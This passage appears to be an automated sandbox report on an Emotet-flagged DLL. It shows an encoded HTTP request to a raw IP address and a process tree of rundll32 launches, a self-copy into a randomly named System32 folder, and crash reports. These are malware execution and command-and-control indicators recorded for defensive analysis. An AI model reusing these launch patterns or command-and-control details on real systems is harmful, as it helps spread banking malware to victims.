                            Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==
                            Host: 45.63.5.129
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            2021-12-02 08:36:58 UTC0INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Thu, 02 Dec 2021 08:36:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            2021-12-02 08:36:58 UTC0INData Raw: 33 61 37 0d 0a 97 3a 56 2d be 96 f5 77 9f c7 15 28 85 07 d0 a4 0c d0 11 7f 52 ef 65 ac c0 f5 22 82 b9 e0 67 75 c5 9f ed 58 e0 d6 58 41 27 f4 04 15 62 39 f8 07 8b 7b 3e b5 a8 9a 35 ff 23 5c 35 67 bd 4b 33 9a 01 02 61 ba e8 6d 52 7b 7c aa 3e 94 97 70 a8 3a 28 66 fe ea 28 a1 85 3a 10 8e e3 a5 2f 25 49 c5 37 f5 16 61 00 26 a2 f7 ae a3 07 66 26 93 d5 0d d9 5b a9 d5 c9 dd d5 40 57 bf eb 5e 5e aa 90 68 41 28 da 0d 71 fe da 82 04 35 47 16 2a e1 6a ae 93 6c b4 4d b2 7b 52 75 a5 3e 49 3a 7f 8b fc 6e 63 ca 9f 2d b8 9d 09 ac ee 3a a8 10 1b 47 18 b3 51 aa 84 a9 0e 83 3c 31 0c 2e a5 3a a5 49 35 7c 09 3a 06 cc 7a 60 6a cf ab bd b2 12 86 ea 92 dc 2d 7b 79 1f a8 10 26 d4 5b 3a 11 60 b6 61 2e 5c cf 55 13 1b 62 c0 02 2b cf 7d 56 17 4d ae 15 2a 95 9d e3 cd 04 80 57 06 ca cf
                            Data Ascii: 3a7:V-w(Re"guXXA'b9{>5#\5gK3amR{|>p:(f(:/%I7a&f&[@W^^hA(q5G*jlM{Ru>I:nc-:GQ<1.:I5|:z`j-{y&[:`a.\Ub+}VM*W


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: loaddll32.exe PID: 6640 Parent PID: 5464

                            General

                            Start time:09:33:09
                            Start date:02/12/2021
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                            Imagebase:0xa20000
                            File size:893440 bytes
                            MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: cmd.exe PID: 6648 Parent PID: 6640

                            General

                            Start time:09:33:09
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 5128 Parent PID: 6640

                            General

                            Start time:09:33:09
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 5444 Parent PID: 6648

                            General

                            Start time:09:33:10
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 5364 Parent PID: 6640

                            General

                            Start time:09:33:14
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 2588 Parent PID: 6640

                            General

                            Start time:09:33:22
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 5472 Parent PID: 5444

                            General

                            Start time:09:34:48
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 5436 Parent PID: 5128

                            General

                            Start time:09:34:49
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 7000 Parent PID: 5364

                            General

                            Start time:09:35:01
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 7016 Parent PID: 2588

                            General

                            Start time:09:35:03
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: svchost.exe PID: 3124 Parent PID: 568

                            General

                            Start time:09:35:07
                            Start date:02/12/2021
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                            Imagebase:0x7ff6eb840000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: WerFault.exe PID: 6152 Parent PID: 3124

                            General

                            Start time:09:35:07
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                            Imagebase:0x10b0000
                            File size:434592 bytes
                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: WerFault.exe PID: 3096 Parent PID: 6640

                            General

                            Start time:09:35:09
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                            Imagebase:0x10b0000
                            File size:434592 bytes
                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: WerFault.exe PID: 6028 Parent PID: 3124

                            General

                            Start time:09:35:15
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                            Imagebase:0x10b0000
                            File size:434592 bytes
                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: WerFault.exe PID: 3176 Parent PID: 6640

                            General

                            Start time:09:35:16
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                            Imagebase:0x10b0000
                            File size:434592 bytes
                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: svchost.exe PID: 6932 Parent PID: 568

                            General

                            Start time:09:35:33
                            Start date:02/12/2021
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff6eb840000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: rundll32.exe PID: 6804 Parent PID: 5436

                            General

                            Start time:09:35:55
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                            Imagebase:0xd60000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, Author: Joe Security

                            Analysis Process: svchost.exe PID: 2800 Parent PID: 568

                            General

                            Start time:09:36:09
                            Start date:02/12/2021
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff6eb840000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: svchost.exe PID: 5728 Parent PID: 568

                            General

                            Start time:09:36:32
                            Start date:02/12/2021
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff6eb840000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: svchost.exe PID: 7152 Parent PID: 568

                            General

                            Start time:09:36:49
                            Start date:02/12/2021
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff6eb840000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Code Analysis

                            Reset < >